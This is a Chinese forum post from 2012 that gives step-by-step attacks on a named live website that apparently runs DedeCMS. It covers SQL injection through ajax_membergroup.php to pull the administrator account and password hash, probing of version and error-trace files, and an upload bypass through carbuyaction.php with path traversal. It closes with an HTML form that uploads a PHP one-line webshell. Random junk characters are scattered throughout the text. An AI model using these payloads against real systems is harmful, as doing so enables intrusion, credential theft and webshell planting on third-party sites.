①注入漏洞。& d- T3 m! W5 e$ X% ]( L# ~
这站 http://www.political-security.com/5 y) K5 H6 t! R3 j3 h
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,2 K8 W4 I/ M$ Q6 {, l% A
www.political-security.com/data/mysql_error_trace.inc 爆后台3 W% W7 M B x5 @1 \& d
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
, s( r7 R. l! j3 f4 _1 Q8 _6 }2 O$ T然后写上语句
+ i# Z( O' B }4 E+ r/ s1 r5 p4 ~查看管理员帐号' @1 l: Y- P e9 O. E0 z
http://www.political-security.co ... &membergroup=@`, \7 ^( ]" [0 B0 j2 ]( n6 e/ p
" y; [! u" L+ a" f" oadmin ; _" N& V8 u" s! a& p2 I* u9 u3 U
- }& F( Z, Y& U# R" V; F查看管理员密码2 R2 k \/ u) Y
http://www.political-security.co ... &membergroup=@`
n9 H m/ {1 N' _2 q# I8 D) O& P' r3 V. i2 \
8d29b1ef9f8c5a5af429
9 A7 b8 _) [5 S3 r. S3 _1 x% b* a* e4 Q3 |- r2 ~# h* Q, M
查看管理员密码8 y& {5 x( r2 L) W; d4 r# M( F5 v4 x1 A) {
$ N/ d6 B$ A% d/ }# |得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD50 F& V9 y9 x/ s: x7 }$ q/ {, W$ Z8 k
* O1 t- e b2 y5 ^8 q0 |8d2) R9 q) s& \, y' B: r2 c& r% d8 J
9b1ef9f8c5a5af428 O* Z; M+ _: [: I
9* f. N" L1 v' T
' s E ?$ \5 r2 g4 V) w, t
cmd5没解出来 只好测试第二个方法
& y3 q- u6 E0 p5 B8 F7 [4 c
% a+ H$ ~& I' w7 g" Z. _* a! g6 G
6 ?$ Y1 z, C2 r( C1 U0 k②上传漏洞:
7 q2 j8 ?5 `$ r) Y
4 p$ c S6 Q' A# p$ o! q只要登陆会员中心,然后访问页面链接
/ L5 w$ q- h! W5 \5 r( ^“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
/ }0 ^+ Q2 b" I6 m+ U7 ? u7 X8 B6 A% A! \0 P
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”& ^ f; E! T3 M
2 [; {6 C x: r2 R3 e于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm" o2 H( C2 ~; V
K. e9 t% h% J& E' h<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
7 X$ C" y; f3 S8 h或者
$ j* [) s; F9 g7 e即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对